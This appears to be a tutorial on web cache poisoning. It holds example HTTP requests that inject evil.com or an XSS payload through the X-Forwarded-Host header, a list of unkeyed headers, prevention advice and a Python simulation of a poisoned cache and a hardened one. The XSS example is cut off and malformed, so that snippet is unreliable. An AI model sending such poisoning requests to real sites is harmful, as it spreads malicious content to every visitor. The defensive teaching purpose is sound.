Key Takeaways

  • Web cache poisoning tricks a shared cache into storing an attacker-influenced response and serving it to every user who requests that URL.
  • Unkeyed inputs: request headers (or other inputs) that change the response but are not part of the cache key.
  • Impact: mass XSS, open redirects to attacker-controlled hosts, and denial of service through cached error pages.
  • Different from cache deception, which targets individual users rather than everyone sharing the cache.

Web caches improve performance by storing responses. If an attacker can inject malicious content that gets cached, every user receiving that cached response is affected. One request, thousands of victims.

How Web Caching Works

Caches typically build the cache key from Host + Path + Query string. Headers such as X-Forwarded-Host often change the response (for example, when the application uses them to build absolute URLs) but are not part of the key; these are "unkeyed inputs." Whatever the first request with such a header caused the origin to return is what the cache stores under the shared key.

Basic Cache Poisoning

# Attacker crafts request with unkeyed header
GET /page HTTP/1.1
Host: example.com
X-Forwarded-Host: evil.com

# Response reflects evil.com (in links, scripts, etc.)
HTTP/1.1 200 OK
<a href="https://evil.com/login">Login</a>

# This response gets cached!
# All subsequent users receive poisoned page

Finding Unkeyed Inputs

# Test headers one by one, using a cache-buster query parameter so each probe gets its own cache entry and does not poison the live page
GET /page?cachebuster=123 HTTP/1.1
Host: example.com
X-Forwarded-Host: test123

# Check response for reflection:
# - Link URLs changed?
# - Script sources modified?
# - Redirects affected?

# Common unkeyed headers:
X-Forwarded-Host
X-Forwarded-Scheme
X-Original-URL
X-Rewrite-URL
Pragma

Exploitation Examples

XSS via X-Forwarded-Host

GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: ">

# Cached response:
<link rel="canonical" href="https://">/"/>

Prevention

  • Include every input that affects the response in the cache key
  • Strip or ignore unneeded headers such as X-Forwarded-Host at the reverse proxy or backend
  • Use the Vary header so the cache keys on any header the response genuinely depends on
  • Validate and sanitize all header inputs (for example, check forwarded hosts against an allowlist of your own hostnames)
  • Purge the cache regularly and after deployments
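The following is an added example (not code from the original page or from any real cache or framework) that models the mechanism above end to end: a cache keyed on Host + path + query, an origin that builds a canonical link from X-Forwarded-Host, and the hardened origin that allowlists the forwarded host and declares Vary. The hostnames, request shapes and TRUSTED_HOSTS set are constructed for the demonstration.

```python
"""Toy shared cache in front of an origin that builds absolute URLs.

Constructed for illustration only; request/response dicts stand in for a real
HTTP stack, and the hostnames below are made up.
"""
import re

# Assumption: these are the site's own hostnames (constructed sample values).
TRUSTED_HOSTS = {"example.com", "www.example.com"}


def origin_vulnerable(req):
    """Origin that trusts X-Forwarded-Host unconditionally (the bug)."""
    host = req["headers"].get("x-forwarded-host", req["headers"]["host"])
    body = f'<link rel="canonical" href="https://{host}{req["path"]}"/>'
    # No Vary header: the cache has no way to know the body depended on the forwarded host.
    return {"status": 200, "headers": {}, "body": body}


def origin_hardened(req):
    """Origin that honours X-Forwarded-Host only when it is one of our own
    hostnames, and declares it in Vary so the cache cannot merge variants."""
    forwarded = req["headers"].get("x-forwarded-host", "")
    host = forwarded if forwarded in TRUSTED_HOSTS else req["headers"]["host"]
    body = f'<link rel="canonical" href="https://{host}{req["path"]}"/>'
    return {"status": 200, "headers": {"Vary": "X-Forwarded-Host"}, "body": body}


class Cache:
    """Cache keyed on Host + path + query. Like a real HTTP cache it stores the
    response's Vary list and only serves a stored entry when the request's
    values for those headers match the ones seen when the entry was stored."""

    def __init__(self, origin):
        self.origin = origin
        self.store = {}  # base_key -> list of (vary_names, vary_values, response)

    def fetch(self, req):
        base_key = (req["headers"]["host"], req["path"], req.get("query", ""))
        for vary_names, vary_values, resp in self.store.get(base_key, []):
            if tuple(req["headers"].get(h, "") for h in vary_names) == vary_values:
                return resp, "HIT"
        resp = self.origin(req)
        vary_names = tuple(
            h.strip().lower()
            for h in resp["headers"].get("Vary", "").split(",")
            if h.strip()
        )
        vary_values = tuple(req["headers"].get(h, "") for h in vary_names)
        self.store.setdefault(base_key, []).append((vary_names, vary_values, resp))
        return resp, "MISS"


def canonical_host(body):
    """Extract the hostname from the canonical link in a response body."""
    match = re.search(r'href="https://([^/"]+)', body)
    return match.group(1) if match else None


def run_scenario(origin):
    """One request carrying a foreign X-Forwarded-Host, then an ordinary user's
    request for the same URL. Returns (host the user sees, cache state)."""
    cache = Cache(origin)
    # Constructed: the first request smuggles an attacker-controlled hostname.
    first = {"path": "/", "headers": {"host": "example.com",
                                      "x-forwarded-host": "attacker.example"}}
    user = {"path": "/", "headers": {"host": "example.com"}}
    cache.fetch(first)
    resp, state = cache.fetch(user)
    return canonical_host(resp["body"]), state


if __name__ == "__main__":
    print("vulnerable:", run_scenario(origin_vulnerable))  # ('attacker.example', 'HIT')
    print("hardened:  ", run_scenario(origin_hardened))    # ('example.com', 'MISS')
```

With the vulnerable origin the ordinary user gets a cache HIT whose canonical link points at the foreign host: the poisoned response was stored under the same Host + path + query key. With the hardened origin the allowlist keeps the foreign host out of the body, and because the response carries Vary: X-Forwarded-Host the cache treats the user's request (no such header) as a different variant. In production, declaring Vary on a header attackers control fragments the cache, so the stronger fix is the list item above: strip or normalise X-Forwarded-Host at the CDN or reverse proxy so the origin never sees an untrusted value.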

Frequently Asked Questions

What's the difference between cache poisoning and cache deception?
Poisoning affects everyone (attacker poisons, all receive bad content). Deception targets individuals (attacker tricks victim into caching their sensitive data, then retrieves it).
